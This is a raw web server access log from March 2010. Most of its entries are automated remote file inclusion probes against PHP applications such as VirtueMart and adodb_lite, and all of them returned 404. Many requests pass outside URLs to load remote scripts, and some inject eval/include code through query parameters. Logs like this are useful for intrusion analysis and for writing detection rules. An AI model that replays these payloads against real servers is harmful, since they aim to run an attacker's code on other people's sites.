110.45.145.178 - - [08/Mar/2010:01:33:02 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
87.106.132.3 - - [08/Mar/2010:01:47:28 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.106.132.3 - - [08/Mar/2010:01:47:28 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.106.132.3 - - [08/Mar/2010:01:47:28 -0800] "GET /logs/access.log%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.106.132.3 - - [08/Mar/2010:01:48:56 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.106.132.3 - - [08/Mar/2010:01:48:56 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.106.132.3 - - [08/Mar/2010:01:48:56 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
122.201.102.68 - - [08/Mar/2010:01:49:05 -0800] "GET /include/write.php?dir=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
122.201.102.68 - - [08/Mar/2010:01:49:05 -0800] "GET /logs//include/write.php?dir=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
122.201.102.68 - - [08/Mar/2010:01:49:05 -0800] "GET /logs/access.log%20%20//include/write.php?dir=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
122.201.102.68 - - [08/Mar/2010:01:49:05 -0800] "GET /logs/access.log%20%20//include/write.php?dir=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
122.201.102.68 - - [08/Mar/2010:01:49:06 -0800] "GET /include/write.php?dir=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
122.201.102.68 - - [08/Mar/2010:01:49:06 -0800] "GET /logs//include/write.php?dir=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.224.132.89 - - [08/Mar/2010:01:49:06 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.224.132.89 - - [08/Mar/2010:01:49:06 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.224.132.89 - - [08/Mar/2010:01:49:06 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
67.195.37.114 - - [08/Mar/2010:01:49:16 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "redneckmba.com"
67.195.37.114 - - [08/Mar/2010:01:49:16 -0800] "GET /?N=D HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "redneckmba.com"
87.106.132.3 - - [08/Mar/2010:01:50:00 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.106.132.3 - - [08/Mar/2010:01:50:00 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.106.132.3 - - [08/Mar/2010:01:50:00 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.106.132.3 - - [08/Mar/2010:01:50:47 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.106.132.3 - - [08/Mar/2010:01:50:49 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.106.132.3 - - [08/Mar/2010:01:50:49 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.224.132.89 - - [08/Mar/2010:01:51:08 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.224.132.89 - - [08/Mar/2010:01:51:08 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.224.132.89 - - [08/Mar/2010:01:51:08 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.224.132.89 - - [08/Mar/2010:01:52:24 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.224.132.89 - - [08/Mar/2010:01:52:34 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.224.132.89 - - [08/Mar/2010:01:52:34 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.224.132.89 - - [08/Mar/2010:01:52:34 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.224.132.89 - - [08/Mar/2010:01:52:35 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.224.132.89 - - [08/Mar/2010:01:52:35 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.224.132.89 - - [08/Mar/2010:01:54:21 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.224.132.89 - - [08/Mar/2010:01:54:21 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.224.132.89 - - [08/Mar/2010:01:54:21 -0800] "GET /logs/access.log%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.106.132.3 - - [08/Mar/2010:01:56:05 -0800] "GET /logs/access.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
203.115.131.17 - - [08/Mar/2010:01:56:16 -0800] "GET //good.php?board_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
203.115.131.17 - - [08/Mar/2010:01:56:16 -0800] "GET /logs/access.log///good.php?board_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
203.115.131.17 - - [08/Mar/2010:01:56:16 -0800] "GET /logs///good.php?board_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
76.13.114.106 - - [08/Mar/2010:01:58:56 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
87.106.132.3 - - [08/Mar/2010:01:59:33 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.106.132.3 - - [08/Mar/2010:01:59:33 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.106.132.3 - - [08/Mar/2010:01:59:33 -0800] "GET /logs/access.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
213.239.206.144 - - [08/Mar/2010:02:01:31 -0800] "GET /logs/access.log%20%20//class.mysql.php?path_to_bt_dir=http://www.hyonsvc.co.kr//bbs//icon/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
213.239.206.144 - - [08/Mar/2010:02:01:31 -0800] "GET /logs//class.mysql.php?path_to_bt_dir=http://www.hyonsvc.co.kr//bbs//icon/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
213.239.206.144 - - [08/Mar/2010:02:01:31 -0800] "GET /class.mysql.php?path_to_bt_dir=http://www.hyonsvc.co.kr//bbs//icon/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
58.150.99.144 - - [08/Mar/2010:02:04:16 -0800] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
58.150.99.144 - - [08/Mar/2010:02:04:16 -0800] "GET /logs/access.log%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
58.150.99.144 - - [08/Mar/2010:02:04:16 -0800] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
76.13.123.195 - - [08/Mar/2010:02:05:09 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
122.201.102.68 - - [08/Mar/2010:02:07:05 -0800] "GET /logs//include/write.php?dir=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
122.201.102.68 - - [08/Mar/2010:02:07:05 -0800] "GET /logs/access.log//include/write.php?dir=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
122.201.102.68 - - [08/Mar/2010:02:07:05 -0800] "GET /include/write.php?dir=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
66.163.171.207 - - [08/Mar/2010:02:08:47 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
122.201.102.68 - - [08/Mar/2010:02:10:20 -0800] "GET /logs/access.log//include/write.php?dir=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
79.141.1.200 - - [08/Mar/2010:02:20:25 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
79.141.1.200 - - [08/Mar/2010:02:20:25 -0800] "GET /write_comment_update.php?board_skin_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
79.141.1.200 - - [08/Mar/2010:02:20:25 -0800] "GET /logs/access.log//write_comment_update.php?board_skin_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.224.132.89 - - [08/Mar/2010:02:22:07 -0800] "GET /logs/access.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
122.201.102.68 - - [08/Mar/2010:02:24:04 -0800] "GET /logs/access.log//include/write.php?dir=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
122.201.102.68 - - [08/Mar/2010:02:24:04 -0800] "GET /include/write.php?dir=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
122.201.102.68 - - [08/Mar/2010:02:24:04 -0800] "GET /logs//include/write.php?dir=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
213.239.206.144 - - [08/Mar/2010:02:25:12 -0800] "GET /logs//class.mysql.php?path_to_bt_dir=http://www.hyonsvc.co.kr//bbs//icon/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
213.239.206.144 - - [08/Mar/2010:02:25:12 -0800] "GET /class.mysql.php?path_to_bt_dir=http://www.hyonsvc.co.kr//bbs//icon/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
213.239.206.144 - - [08/Mar/2010:02:25:12 -0800] "GET /logs/access.log%20%20//class.mysql.php?path_to_bt_dir=http://www.hyonsvc.co.kr//bbs//icon/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.224.132.89 - - [08/Mar/2010:02:25:51 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.224.132.89 - - [08/Mar/2010:02:25:51 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.224.132.89 - - [08/Mar/2010:02:25:51 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
122.201.102.68 - - [08/Mar/2010:02:27:57 -0800] "GET /logs/access.log//include/write.php?dir=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
95.110.224.127 - - [08/Mar/2010:02:28:12 -0800] "GET /logs///components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lpm.mgroup.pl/modules/xoopsgallery/id? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
87.224.132.89 - - [08/Mar/2010:02:29:59 -0800] "GET /logs/access.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.224.132.89 - - [08/Mar/2010:02:29:59 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.224.132.89 - - [08/Mar/2010:02:29:59 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
216.119.103.12 - - [08/Mar/2010:02:37:22 -0800] "GET /write_update.php?board_skin_path=http://www.cdam.biz/image/map1.jpg???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
216.119.103.12 - - [08/Mar/2010:02:37:22 -0800] "GET /logs//write_update.php?board_skin_path=http://www.cdam.biz/image/map1.jpg???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
216.119.103.12 - - [08/Mar/2010:02:37:25 -0800] "GET /logs/access.log%20%20//write_update.php?board_skin_path=http://www.cdam.biz/image/map1.jpg???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
79.141.1.200 - - [08/Mar/2010:02:39:44 -0800] "GET /board/bbs///good.php?board_skin_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
79.141.1.200 - - [08/Mar/2010:02:39:44 -0800] "GET /logs//board/bbs///good.php?board_skin_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
79.141.1.200 - - [08/Mar/2010:02:39:44 -0800] "GET /logs/access.log%20%20//board/bbs///good.php?board_skin_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
76.13.114.107 - - [08/Mar/2010:02:42:11 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
87.224.132.89 - - [08/Mar/2010:02:42:56 -0800] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.224.132.89 - - [08/Mar/2010:02:42:56 -0800] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.224.132.89 - - [08/Mar/2010:02:42:56 -0800] "GET /logs/access.log%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
216.119.103.12 - - [08/Mar/2010:02:50:48 -0800] "GET /logs/access.log//write_update.php?board_skin_path=http://www.cdam.biz/image/map1.jpg???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
66.163.171.205 - - [08/Mar/2010:02:53:27 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
87.224.132.89 - - [08/Mar/2010:02:59:38 -0800] "GET /include/write.php?dir=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.224.132.89 - - [08/Mar/2010:02:59:38 -0800] "GET /logs//include/write.php?dir=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.224.132.89 - - [08/Mar/2010:02:59:38 -0800] "GET /logs/access.log%20%20//include/write.php?dir=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.224.132.89 - - [08/Mar/2010:02:59:49 -0800] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.224.132.89 - - [08/Mar/2010:02:59:49 -0800] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.224.132.89 - - [08/Mar/2010:02:59:56 -0800] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
79.141.1.200 - - [08/Mar/2010:03:19:58 -0800] "GET /board/bbs///good.php?board_skin_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
79.141.1.200 - - [08/Mar/2010:03:19:58 -0800] "GET /logs//board/bbs///good.php?board_skin_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
79.141.1.200 - - [08/Mar/2010:03:19:58 -0800] "GET /logs/access.log%20%20//board/bbs///good.php?board_skin_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
118.129.170.49 - - [08/Mar/2010:03:20:15 -0800] "GET /logs//bbs/write_comment_update.php?board_skin_path=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
118.129.170.49 - - [08/Mar/2010:03:20:16 -0800] "GET /logs/access.log//bbs/write_comment_update.php?board_skin_path=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
118.129.170.49 - - [08/Mar/2010:03:20:19 -0800] "GET /bbs/write_comment_update.php?board_skin_path=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
76.13.114.105 - - [08/Mar/2010:03:21:08 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.123.195 - - [08/Mar/2010:03:27:43 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
110.45.145.178 - - [08/Mar/2010:03:30:18 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
208.69.40.227 - - [08/Mar/2010:03:30:56 -0800] "GET /logs/access.log//bbs/write_update.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
208.69.40.227 - - [08/Mar/2010:03:30:56 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
208.69.40.227 - - [08/Mar/2010:03:30:56 -0800] "GET /bbs/write_update.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
208.69.40.227 - - [08/Mar/2010:03:31:01 -0800] "GET /logs/access.log%20%20//bbs/write_update.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
208.69.40.227 - - [08/Mar/2010:03:31:01 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
208.69.40.227 - - [08/Mar/2010:03:31:01 -0800] "GET /bbs/write_update.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
208.69.40.227 - - [08/Mar/2010:03:31:07 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
208.69.40.227 - - [08/Mar/2010:03:31:07 -0800] "GET /bbs/write_update.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
208.69.40.227 - - [08/Mar/2010:03:31:07 -0800] "GET /logs/access.log%20%20//bbs/write_update.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
208.69.40.227 - - [08/Mar/2010:03:32:10 -0800] "GET /bbs/write_update.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
208.69.40.227 - - [08/Mar/2010:03:32:10 -0800] "GET /logs/access.log//bbs/write_update.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
208.69.40.227 - - [08/Mar/2010:03:32:10 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
66.163.171.207 - - [08/Mar/2010:03:33:46 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
110.45.145.178 - - [08/Mar/2010:03:34:49 -0800] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "redneckmba.com"
110.45.145.178 - - [08/Mar/2010:03:34:50 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "redneckmba.com"
110.45.145.178 - - [08/Mar/2010:03:34:50 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "redneckmba.com"
213.175.197.86 - - [08/Mar/2010:03:37:14 -0800] "GET /logs/access.log//////delete_comment.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
